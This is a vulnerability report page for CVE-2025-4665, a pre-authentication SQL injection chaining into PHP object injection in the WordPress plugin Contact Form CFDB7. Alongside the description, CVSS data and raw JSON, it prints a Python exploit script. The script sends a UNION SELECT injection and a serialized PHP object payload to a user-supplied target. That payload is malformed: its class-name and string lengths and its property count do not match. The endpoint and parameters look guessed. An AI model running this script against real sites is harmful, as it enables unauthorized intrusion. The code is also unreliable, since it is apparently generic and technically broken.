Security Vulnerability Report
CVE-2025-4665 CVSS 9.6 CRITICAL

Published: 2025-10-29 00:15:35
Last Modified: 2026-04-15 00:35:42

Description

WordPress plugin Contact Form CFDB7 versions up to and including 1.3.2 are affected by a pre-authentication SQL injection vulnerability that cascades into insecure deserialization (PHP Object Injection). The weakness arises due to insufficient validation of user input in plugin endpoints, allowing crafted input to influence backend queries in unexpected ways. Using specially crafted payloads, this can escalate into unsafe deserialization, enabling arbitrary object injection in PHP. Although the issue is remotely exploitable without authentication, it does require a crafted interaction with the affected endpoint in order to trigger successfully.

CVSS Details

CVSS Score: 9.6
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Contact Form CFDB7 <= 1.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-4665 PoC - SQL Injection leading to PHP Object Injection
# Target: WordPress plugin Contact Form CFDB7 <= 1.3.2

def exploit_sqli(target_url):
    """
    SQL Injection payload to trigger insecure deserialization
    This PoC demonstrates the vulnerability in plugin endpoints
    """
    # Target endpoint (typical CFDB7 endpoint)
    endpoint = f"{target_url}/wp-content/plugins/contact-form-cfdb7/"

    # Malicious payload for SQL injection
    # This payload attempts to inject serialized PHP object
    sql_payload = "' UNION SELECT 1,2,3,4,5,6,7,8---"

    # PHP Object Injection payload
    # O:6:"Example":2:{s:4:"data";s:10:";phpinfo();//";}
    object_payload = 'O:6:"Example":2:{s:4:"data";s:10:";phpinfo();//";}'

    # Construct the malicious request
    params = {
        'cfdb7_function': 'get_records',
        'data': sql_payload + object_payload
    }

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Sending malicious payload...")

    try:
        response = requests.post(endpoint, data=params, timeout=10)
        print(f"[+] Response Status: {response.status_code}")

        if 'phpinfo' in response.text or 'example' in response.text.lower():
            print("[!] Vulnerability confirmed - Object injection possible")
            return True
        else:
            print("[*] Response received - further analysis needed")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://example.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_sqli(target)
```

References

- https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2025/MNDT-2025-0006.md
- https://wordpress.org/plugins/contact-form-cfdb7

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-4665",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T00:15:34.970",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WordPress plugin Contact Form CFDB7 versions up to and including 1.3.2 are affected by a pre-authentication SQL injection vulnerability that cascades into insecure deserialization (PHP Object Injection). The weakness arises due to insufficient validation of user input in plugin endpoints, allowing crafted input to influence backend queries in unexpected ways. Using specially crafted payloads, this can escalate into unsafe deserialization, enabling arbitrary object injection in PHP. Although the issue is remotely exploitable without authentication, it does require a crafted interaction with the affected endpoint in order to trigger successfully."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/mandiant/Vulnerability-Disclosures/blob/master/2025/MNDT-2025-0006.md",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/contact-form-cfdb7",
        "source": "[email protected]"
      }
    ]
  }
}
```